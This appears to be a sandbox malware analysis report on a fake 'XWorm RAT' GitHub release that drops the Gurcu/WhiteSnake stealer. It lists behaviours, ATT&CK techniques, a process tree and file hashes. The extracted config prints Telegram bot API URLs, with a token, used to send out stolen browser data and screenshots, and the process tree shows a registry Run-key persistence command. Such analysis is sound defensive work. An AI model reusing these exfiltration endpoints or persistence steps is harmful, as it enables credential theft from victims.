gurcu | hxxps://github[.]com/Intestio/XWorm-RAT/releases/tag/xworm

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03/01/2025, 15:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Intestio/XWorm-RAT/releases/tag/xworm

Score

10^/10

gurcu discovery persistence spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.21%20kb

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendMessage?chat_id=-1002258988684

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%B8Screenshot%20take

Signatures

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	Command Reciever.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	conhost.exe

Executes dropped EXE 2 IoCs

pid	Process
4988	Command Reciever.exe
4864	conhost.exe

Loads dropped DLL 2 IoCs

pid	Process
4988	Command Reciever.exe
4864	conhost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\AdobeUpdate\\conhost.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
88	raw.githubusercontent.com
89	raw.githubusercontent.com
92	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
85	ip-api.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
2288	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Command Reciever.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XWorm RAT V2.1.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Command Reciever.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Command Reciever.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	conhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	conhost.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2724	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1252	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2904	msedge.exe
2904	msedge.exe
4512	msedge.exe
4512	msedge.exe
3056	identity_helper.exe
3056	identity_helper.exe
808	msedge.exe
808	msedge.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4988	Command Reciever.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
4864	conhost.exe
2872	Command Reciever.exe
2872	Command Reciever.exe
2872	Command Reciever.exe
2872	Command Reciever.exe
2872	Command Reciever.exe
2872	Command Reciever.exe
4864	conhost.exe
2872	Command Reciever.exe
2872	Command Reciever.exe
2872	Command Reciever.exe
2872	Command Reciever.exe
2872	Command Reciever.exe
2872	Command Reciever.exe
2872	Command Reciever.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4988	Command Reciever.exe
Token: SeDebugPrivilege	2288	tasklist.exe
Token: SeDebugPrivilege	4864	conhost.exe

Suspicious use of FindShellTrayWindow 52 IoCs

pid	Process
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
2872	Command Reciever.exe

Suspicious use of SendNotifyMessage 25 IoCs

pid	Process
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
2872	Command Reciever.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4864	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4512 wrote to memory of 3492	4512	msedge.exe	82
PID 4512 wrote to memory of 3492	4512	msedge.exe	82
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2244	4512	msedge.exe	83
PID 4512 wrote to memory of 2904	4512	msedge.exe	84
PID 4512 wrote to memory of 2904	4512	msedge.exe	84
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85
PID 4512 wrote to memory of 464	4512	msedge.exe	85

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa2a4e46f8,0x7ffa2a4e4708,0x7ffa2a4e4718
  2⤵
  PID:3492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,2642312065957168554,4903156975476286475,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
  2⤵
  PID:2244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,2642312065957168554,4903156975476286475,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,2642312065957168554,4903156975476286475,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:8
  2⤵
  PID:464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,2642312065957168554,4903156975476286475,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
  2⤵
  PID:4612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,2642312065957168554,4903156975476286475,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
  2⤵
  PID:4692
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,2642312065957168554,4903156975476286475,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
  2⤵
  PID:2408
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,2642312065957168554,4903156975476286475,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,2642312065957168554,4903156975476286475,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
  2⤵
  PID:4844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,2642312065957168554,4903156975476286475,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
  2⤵
  PID:4652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,2642312065957168554,4903156975476286475,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
  2⤵
  PID:2172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,2642312065957168554,4903156975476286475,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
  2⤵
  PID:2876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,2642312065957168554,4903156975476286475,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
  2⤵
  PID:812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,2642312065957168554,4903156975476286475,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5028 /prefetch:8
  2⤵
  PID:736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,2642312065957168554,4903156975476286475,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5880 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,2642312065957168554,4903156975476286475,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:2
  2⤵
  PID:1328

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2164

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1168

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1080

C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:2400
- C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe
  "C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2872
- C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
  "C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4988
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpBAFE.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpBAFE.tmp.bat
    3⤵
    PID:3032
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:948
  - - C:\Windows\system32\tasklist.exe
      Tasklist /fi "PID eq 4988"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2288
  - - C:\Windows\system32\find.exe
      find ":"
      4⤵
      PID:4428
  - - C:\Windows\system32\timeout.exe
      Timeout /T 1 /Nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2724
  - - C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe
      "C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:4864
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f
        5⤵
        
        PID:2372
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:1252

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2308

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
dc058ebc0f8181946a312f0be99ed79c

SHA1
0c6f376ed8f2d4c275336048c7c9ef9edf18bff0

SHA256
378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a

SHA512
36e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a0486d6f8406d852dd805b66ff467692

SHA1
77ba1f63142e86b21c951b808f4bc5d8ed89b571

SHA256
c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be

SHA512
065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
199890976a65fb31655ad8c872a91d07

SHA1
1022187cf89e7a6e9b62f6f15d76257fe38c15d8

SHA256
8afb9670e69c5f58eb3f0d4accd0218a2609ce543697038b4f1e77a821cdb4d6

SHA512
9275cd2a85909e043669785f75ced17de65f392fc067448f4c12265c058334749a5760a5a61b4da18aff9ae897909783d38c0afb41d6b2aa3b0a051224d5467d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
f1d1e82734fa321fe702d6dea3e78294

SHA1
1fcef95f88b9dd7ab7525fa4fd6b588d6beaf332

SHA256
44c865b1e61df3a64e2a95248f3d656a8209a132b3a17350f74e434426c1153a

SHA512
4f4b95b9856de61fd8a6ecee892496612aeb4faf5eeec8effc7b12e2447f5a67b550abcf603044d8bc145f2c262b9161092ff966303cf31ef644abf413d3fda8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
643B

MD5
b6f8b76fd2213e4633a615b38df3d5c0

SHA1
045e64d5f31a5a80f46eba47c1c7f2e886b8303b

SHA256
312c454d3ab253f0598f2200e23d58f0b4f2bfb9e9225204932ae4abd1346ad1

SHA512
ce2c9613c081c1820e1955899b51a8e59cce4bf49262545eca4d633bbd1ee3a70e49d1210f74a6cab50460f83f8f0d91c87e98a16acb15410bd166128e34ed74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
807419ca9a4734feaf8d8563a003b048

SHA1
a723c7d60a65886ffa068711f1e900ccc85922a6

SHA256
aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631

SHA512
f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
5e99e7b54837d700ac0b49cb412f9bf0

SHA1
48ac8a08189abc00a2b48937576618203958c9b9

SHA256
2a78466ff8272dbe0583ef60555cabacadf0de34d8a3eab2b8e20c2319dac92e

SHA512
98745b5c38faff7f1b8e4c8d218812906f7b449eb0ad326a5d748bf4f4bbe462f5c6759184f6fe6e863bfa3b1bdda9eec2bc7a975b43fde204bb368523e0d792

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
33304eae6a13b667992e3ef4b7af3da7

SHA1
037e0458c1b95ea06211506306ce965d714f0424

SHA256
c2bc03a5d0d8f0c036f849bbec41818e6f7dab94441532a9bce2561d03b3973e

SHA512
